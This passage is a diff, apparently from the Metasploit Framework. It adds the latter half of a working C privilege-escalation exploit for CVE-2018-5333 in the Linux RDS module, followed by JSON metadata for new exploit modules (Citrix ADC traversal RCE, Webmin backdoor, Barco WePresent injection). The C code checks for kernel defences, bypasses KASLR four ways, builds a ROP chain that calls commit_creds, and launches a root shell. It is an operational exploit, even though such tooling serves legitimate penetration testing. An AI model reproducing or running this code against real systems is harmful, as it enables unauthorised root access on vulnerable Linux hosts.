+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
+  }
+
+  if (stat("/proc/sys/lkrg", &st) == 0) {
+    dprintf("[!] Warning: lkrg is in use\n");
+  }
+
+  return 0;
+}
+
+struct utsname get_kernel_version() {
+  struct utsname u;
+  int rv = uname(&u);
+  if (rv != 0) {
+    dprintf("[-] uname()\n");
+    exit(EXIT_FAILURE);
+  }
+  return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
+
+void detect_versions() {
+  struct utsname u;
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
+
+  u = get_kernel_version();
+
+  if (strstr(u.machine, "64") == NULL) {
+    dprintf("[-] system is not using a 64-bit kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (strstr(u.version, "-Ubuntu") == NULL) {
+    dprintf("[-] system is not using an Ubuntu kernel\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char *u_ver = strtok(u.version, " ");
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
+
+  int i;
+  for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+    if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+      dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+      kernel = i;
+      return;
+    }
+  }
+
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
+  exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+unsigned long get_kernel_addr_kallsyms() {
+  FILE *f;
+  unsigned long addr = 0;
+  char dummy;
+  char sname[256];
+  char* name = "startup_64";
+  char* path = "/proc/kallsyms";
+
+  dprintf("[.] trying %s...\n", path);
+  f = fopen(path, "r");
+  if (f == NULL) {
+      dprintf("[-] open/read(%s): %m\n", path);
+      return 0;
+  }
+
+  int ret = 0;
+  while (ret != EOF) {
+    ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+    if (ret == 0) {
+      fscanf(f, "%s\n", sname);
+      continue;
+    }
+    if (!strcmp(name, sname)) {
+      fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
+      return addr;
+    }
+  }
+
+  fclose(f);
+  dprintf("[-] kernel base not found in %s\n", path);
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER): %m\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL): %m\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+
+  if (substr == NULL)
+    return 0;
+
+  char* endptr = &substr[16];
+  unsigned long addr = strtoul(&substr[0], &endptr, 16);
+
+  addr &= 0xfffffffffff00000ul;
+  addr -= 0x1000000ul;
+
+  if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+    return addr;
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+#endif
+
+// * * * * * * * * * * * perf_event_open KASLR bypass * * * * * * * * * * *
+// https://blog.lizzie.io/kaslr-and-perf.html
+
+#if ENABLE_KASLR_BYPASS_PERF
+int perf_event_open(struct perf_event_attr *attr, pid_t pid, int cpu, int group_fd, unsigned long flags)
+{
+  return syscall(SYS_perf_event_open, attr, pid, cpu, group_fd, flags);
+}
+
+unsigned long get_kernel_addr_perf() {
+  int fd;
+  pid_t child;
+
+  dprintf("[.] trying perf_event_open sampling...\n");
+
+  child = fork();
+
+  if (child == -1) {
+    dprintf("[-] fork() failed: %m\n");
+    return 0;
+  }
+
+  if (child == 0) {
+    struct utsname self = {0};
+    while (1) uname(&self);
+    return 0;
+  }
+
+  struct perf_event_attr event = {
+    .type = PERF_TYPE_SOFTWARE,
+    .config = PERF_COUNT_SW_TASK_CLOCK,
+    .size = sizeof(struct perf_event_attr),
+    .disabled = 1,
+    .exclude_user = 1,
+    .exclude_hv = 1,
+    .sample_type = PERF_SAMPLE_IP,
+    .sample_period = 10,
+    .precise_ip = 1
+  };
+
+  fd = perf_event_open(&event, child, -1, -1, 0);
+
+  if (fd < 0) {
+    dprintf("[-] syscall(SYS_perf_event_open): %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  uint64_t page_size = getpagesize();
+  struct perf_event_mmap_page *meta_page = NULL;
+  meta_page = mmap(NULL, (page_size * 2), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
+
+  if (meta_page == MAP_FAILED) {
+    dprintf("[-] mmap() failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+
+  if (ioctl(fd, PERF_EVENT_IOC_ENABLE)) {
+    dprintf("[-] ioctl failed: %m\n");
+    if (child) kill(child, SIGKILL);
+    if (fd > 0) close(fd);
+    return 0;
+  }
+  char *data_page = ((char *) meta_page) + page_size;
+
+  size_t progress = 0;
+  uint64_t last_head = 0;
+  size_t num_samples = 0;
+  unsigned long min_addr = ~0;
+  while (num_samples < 100) {
+    /* is reading from the meta_page racy? no idea */
+    while (meta_page->data_head == last_head);;
+    last_head = meta_page->data_head;
+
+    while (progress < last_head) {
+      struct __attribute__((packed)) sample {
+        struct perf_event_header header;
+        uint64_t ip;
+      } *here = (struct sample *) (data_page + progress % page_size);
+      switch (here->header.type) {
+      case PERF_RECORD_SAMPLE:
+        num_samples++;
+        if (here->header.size < sizeof(*here)) {
+          dprintf("[-] size too small.\n");
+          if (child) kill(child, SIGKILL);
+          if (fd > 0) close(fd);
+          return 0;
+        }
+
+        uint64_t prefix;
+        if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+          prefix = here->ip & ~0xfffff;
+        } else {
+          prefix = here->ip & ~0xffffff;
+        }
+
+        if (prefix < min_addr) min_addr = prefix;
+        break;
+      case PERF_RECORD_THROTTLE:
+      case PERF_RECORD_UNTHROTTLE:
+      case PERF_RECORD_LOST:
+        break;
+      default:
+        dprintf("[-] unexpected perf event: %x\n", here->header.type);
+        if (child) kill(child, SIGKILL);
+              if (fd > 0) close(fd);
+        return 0;
+      }
+      progress += here->header.size;
+    }
+    /* tell the kernel we read it. */
+    meta_page->data_tail = last_head;
+  }
+
+  if (child) kill(child, SIGKILL);
+  if (fd > 0) close(fd);
+  return min_addr;
+}
+#endif
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+unsigned long get_kernel_addr_mincore() {
+  unsigned char buf[getpagesize() / sizeof(unsigned char)];
+  unsigned long iterations = 20000000;
+  unsigned long addr = 0;
+
+  dprintf("[.] trying mincore info leak...\n");
+
+  if (strstr(kernels[kernel].kernel_version, "4.8.0-")) {
+    dprintf("[-] target kernel does not permit mincore info leak\n");
+    return 0;
+  }
+
+  /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+  if (mmap((void*)0x66000000, 0x20000000000,
+       PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+    dprintf("[-] mmap(): %m\n");
+    return 0;
+  }
+
+  int i;
+  for (i = 0; i <= iterations; i++) {
+    /* Touch a mishandle with this type mapping */
+    if (mincore((void*)0x86000000, 0x1000000, buf)) {
+      dprintf("[-] mincore(): %m\n");
+      return 0;
+    }
+
+    int n;
+    for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
+      addr = *(unsigned long*)(&buf[n]);
+      /* Kernel address space */
+      if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
+        addr &= 0xffffffffff000000ul;
+        if (munmap((void*)0x66000000, 0x20000000000))
+          dprintf("[-] munmap(): %m\n");
+        return addr;
+      }
+    }
+  }
+
+  if (munmap((void*)0x66000000, 0x20000000000))
+    dprintf("[-] munmap(): %m\n");
+
+  dprintf("[-] kernel base not found in mincore info leak\n");
+  return 0;
+}
+#endif
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+  unsigned long addr = 0;
+
+#if ENABLE_KASLR_BYPASS_KALLSYMS
+  addr = get_kernel_addr_kallsyms();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_SYSLOG
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_PERF
+  addr = get_kernel_addr_perf();
+  if (addr) return addr;
+#endif
+
+#if ENABLE_KASLR_BYPASS_MINCORE
+  addr = get_kernel_addr_mincore();
+  if (addr) return addr;
+#endif
+
+  dprintf("[-] KASLR bypass failed, kernel base not found\n");
+  exit(EXIT_FAILURE);
+
+  return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+static void shell() {
+  if (getuid() == 0 && geteuid() == 0) {
+    dprintf("[+] got root\n");
+    system(SHELL);
+  } else {
+    dprintf("[-] failed\n");
+  }
+  exit(EXIT_FAILURE);
+}
+
+void fork_shell() {
+  pid_t rv;
+
+  rv = fork();
+  if (rv == -1) {
+    dprintf("[-] fork(): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  if (rv == 0)
+    shell();
+}
+
+int main(int argc, char *argv[]) {
+  if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)\n");
+
+  dprintf("[.] checking kernel version...\n");
+  detect_versions();
+  dprintf("[~] done, version looks good\n");
+
+#if ENABLE_SYSTEM_CHECKS
+  dprintf("[.] checking system...\n");
+  check_env();
+  dprintf("[~] done, looks good\n");
+#endif
+
+  dprintf("[.] mapping null address...\n");
+  map_null();
+  dprintf("[~] done, mapped null address\n");
+
+#if ENABLE_KASLR_BYPASS
+  dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+  KERNEL_BASE = get_kernel_addr();
+  dprintf("[.] done, kernel text:   %lx\n", KERNEL_BASE);
+#endif
+
+  unsigned long commit_creds =        (KERNEL_BASE + kernels[kernel].commit_creds);
+  unsigned long prepare_kernel_cred = (KERNEL_BASE + kernels[kernel].prepare_kernel_cred);
+  unsigned long xor_rdi =             (KERNEL_BASE + kernels[kernel].xor_rdi);
+  unsigned long mov_rdi_rax =         (KERNEL_BASE + kernels[kernel].mov_rdi_rax);
+  unsigned long xchg_esp =            (KERNEL_BASE + kernels[kernel].xchg_esp);
+  unsigned long swapgs =              (KERNEL_BASE + kernels[kernel].swapgs);
+  unsigned long iretq =               (KERNEL_BASE + kernels[kernel].iretq);
+
+  dprintf("[.] commit_creds:        %lx\n", commit_creds);
+  dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
+
+  dprintf("[.] mmapping fake stack...\n");
+
+  uint64_t page_size = getpagesize();
+  uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
+  uint64_t stack_offset = xchg_esp % page_size;
+
+  unsigned long *fake_stack = mmap((void*)stack_aligned, 0x200000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (fake_stack == MAP_FAILED) {
+    dprintf("[-] mmap(fake_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long *temp_stack = mmap((void*)0x30000000, 0x10000000,
+    PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (temp_stack == MAP_FAILED) {
+    dprintf("[-] mmap(temp_stack): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  static unsigned long result = 0;
+  unsigned long *data = (unsigned long *)0;
+  data[1] = (uint64_t)&result;
+  data[3] = xchg_esp;
+
+  save_state();
+  debug_enable_sigsev_handler();
+
+  fake_stack = (unsigned long *)(stack_aligned + stack_offset);
+
+  int i = 0;
+
+  fake_stack[i++] = xor_rdi;
+  fake_stack[i++] = prepare_kernel_cred;
+  fake_stack[i++] = mov_rdi_rax;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = 0x12345678;
+  fake_stack[i++] = commit_creds;
+
+  fake_stack[i++] = swapgs;
+  fake_stack[i++] = 0x12345678;
+
+  fake_stack[i++] = iretq;
+  fake_stack[i++] = (unsigned long)shell;
+  fake_stack[i++] = user_cs;
+  fake_stack[i++] = user_rflags;
+  fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
+  fake_stack[i++] = user_ss;
+
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %p...\n", (void*)&shell);
+  trigger_bug();
+
+  return 0;
+}
+
@@ -17525,7 +17525,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_bootparamd_domain.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_bootparamd_domain",
@@ -17563,7 +17563,7 @@

    ],
    "targets": null,
-    "mod_time": "2018-01-13 22:55:01 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/gather/nis_ypserv_map.rb",
    "is_install_path": true,
    "ref_name": "gather/nis_ypserv_map",
@@ -17844,7 +17844,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-10-31 13:07:41 +0000",
+    "mod_time": "2020-01-14 00:34:06 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -22669,6 +22669,57 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/citrix_dir_traversal": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal Scanner",
+    "fullname": "auxiliary/scanner/http/citrix_dir_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-17",
+    "type": "auxiliary",
+    "author": [
+      "Erik Wynter",
+      "altonjx"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n        (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n        /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n        a \"[global]\" directive in smb.conf, which this file should always contain.",
+    "references": [
+      "CVE-2019-19781",
+      "URL-https://support.citrix.com/article/CTX267027/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-14 11:21:03 +0000",
+    "path": "/modules/auxiliary/scanner/http/citrix_dir_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/citrix_dir_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/clansphere_traversal": {
    "name": "ClanSphere 2011.3 Local File Inclusion Vulnerability",
    "fullname": "auxiliary/scanner/http/clansphere_traversal",
@@ -30822,6 +30873,54 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/tvt_nvms_traversal": {
+    "name": "TVT NVMS-1000 Directory Traversal",
+    "fullname": "auxiliary/scanner/http/tvt_nvms_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-12-12",
+    "type": "auxiliary",
+    "author": [
+      "Numan Türle",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits an unauthenticated directory traversal vulnerability which\n        exists in TVT network surveillance management software-1000 version 3.4.1.\n        NVMS listens by default on port 80.",
+    "references": [
+      "CVE-2019-20085",
+      "EDB-47774"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-01-21 08:43:19 +0000",
+    "path": "/modules/auxiliary/scanner/http/tvt_nvms_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/tvt_nvms_traversal",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/typo3_bruteforce": {
    "name": "Typo3 Login Bruteforcer",
    "fullname": "auxiliary/scanner/http/typo3_bruteforce",
@@ -33697,7 +33796,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-16 14:21:09 +0000",
    "path": "/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/sunrpc_portmapper",
@@ -51853,6 +51952,80 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/citrix_dir_traversal_rce": {
+    "name": "Citrix ADC (NetScaler) Directory Traversal RCE",
+    "fullname": "exploit/linux/http/citrix_dir_traversal_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-12-17",
+    "type": "exploit",
+    "author": [
+      "Project Zero India",
+      "TrustedSec",
+      "James Brytan",
+      "James Smith",
+      "Marisa Mack",
+      "Rob Vinson",
+      "Sergey Pashevkin",
+      "Steven Laura",
+      "mekhalleh (RAMELLA Sébastien)"
+    ],
+    "description": "This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka\n        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.",
+    "references": [
+      "CVE-2019-19781",
+      "EDB-47901",
+      "EDB-47902",
+      "URL-https://support.citrix.com/article/CTX267027/",
+      "URL-https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/"
+    ],
+    "platform": "Python,Unix",
+    "arch": "python, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Python",
+      "Unix Command"
+    ],
+    "mod_time": "2020-01-14 10:46:04 +0000",
+    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/citrix_dir_traversal_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "Shitrix"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_linux/http/cpi_tararchive_upload": {
    "name": "Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability",
    "fullname": "exploit/linux/http/cpi_tararchive_upload",
@@ -58777,6 +58950,70 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/webmin_backdoor": {
+    "name": "Webmin password_change.cgi Backdoor",
+    "fullname": "exploit/linux/http/webmin_backdoor",
+    "aliases": [
+      "exploit/unix/webapp/webmin_backdoor"
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-08-10",
+    "type": "exploit",
+    "author": [
+      "AkkuS",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a backdoor in Webmin versions 1.890 through 1.920.\n        Only the SourceForge downloads were backdoored, but they are listed as\n        official downloads on the project's site.\n\n        Unknown attacker(s) inserted Perl qx statements into the build server's\n        source code on two separate occasions: once in April 2018, introducing\n        the backdoor in the 1.890 release, and in July 2018, reintroducing the\n        backdoor in releases 1.900 through 1.920.\n\n        Only version 1.890 is exploitable in the default install. Later affected\n        versions require the expired password changing feature to be enabled.",
+    "references": [
+      "CVE-2019-15107",
+      "URL-http://www.webmin.com/exploit.html",
+      "URL-https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html",
+      "URL-https://blog.firosolutions.com/exploits/webmin/",
+      "URL-https://github.com/webmin/webmin/issues/947"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 10000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2020-01-16 14:46:00 +0000",
+    "path": "/modules/exploits/linux/http/webmin_backdoor.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/webmin_backdoor",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/webmin_packageup_rce": {
    "name": "Webmin Package Updates Remote Command Execution",
    "fullname": "exploit/linux/http/webmin_packageup_rce",
@@ -58826,6 +59063,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/wepresent_cmd_injection": {
+    "name": "Barco WePresent file_transfer.cgi Command Injection",
+    "fullname": "exploit/linux/http/wepresent_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-04-30",
+    "type": "exploit",
+    "author": [
+      "Jacob Baines"
+    ],
+    "description": "This module exploits an unauthenticated remote command injection\n        vulnerability found in Barco WePresent and related OEM'ed products.\n        The vulnerability is triggered via an HTTP POST request to the\n        file_transfer.cgi endpoint.",
+    "references": [
+      "CVE-2019-3929",
+      "EDB-46786",
+      "URL-https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix In-Memory",
+      "Linux Dropper"
+    ],
+    "mod_time": "2020-01-14 07:52:30 +0000",
+    "path": "/modules/exploits/linux/http/wepresent_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/wepresent_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/wipg1000_cmd_injection": {
    "name": "WePresent WiPG-1000 Command Injection",
    "fullname": "exploit/linux/http/wipg1000_cmd_injection",
@@ -59301,7 +59589,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/abrt_raceabrt_priv_esc",
@@ -59549,7 +59837,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-26 13:11:40 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/apt_package_manager_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/apt_package_manager_persistence",
@@ -59641,7 +59929,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-08-20 17:51:41 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/autostart_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/autostart_persistence",
@@ -59680,7 +59968,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-12-14 21:40:18 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/bash_profile_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bash_profile_persistence",
@@ -60470,7 +60758,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2020-01-16 15:04:57 +0000",
    "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -60949,7 +61237,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2018-11-04 05:28:32 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
    "path": "/modules/exploits/linux/local/rc_local_persistence.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rc_local_persistence",
@@ -60960,6 +61248,64 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc": {
+    "name": "Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation",
+    "fullname": "exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2018-11-01",
+    "type": "exploit",
+    "author": [
+      "Mohamed Ghannam",
+      "Jann Horn",
+      "wbowling",
+      "bcoles <bcoles@gmail.com>",
+      "nstarke"
+    ],
+    "description": "This module attempts to gain root privileges on Linux systems by abusing\n        a NULL pointer dereference in the `rds_atomic_free_op` function in the\n        Reliable Datagram Sockets (RDS) kernel module (rds.ko).\n\n        Successful exploitation requires the RDS kernel module to be loaded.\n        If the RDS module is not blacklisted (default); then it will be loaded\n        automatically.\n\n        This exploit supports 64-bit Ubuntu Linux systems, including distributions\n        based on Ubuntu, such as Linux Mint and Zorin OS.\n\n        Target offsets are available for:\n\n        Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and\n        Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.\n\n        This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included.\n        Failed exploitation may crash the kernel.\n\n        This module has been tested successfully on various 4.4 and 4.8 kernels.",
+    "references": [
+      "CVE-2018-5333",
+      "CVE-2019-9213",
+      "BID-102510",
+      "URL-https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4",
+      "URL-https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c",
+      "URL-https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2",
+      "URL-https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737",
+      "URL-https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d",
+      "URL-https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c"
+    ],
+    "platform": "Linux",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
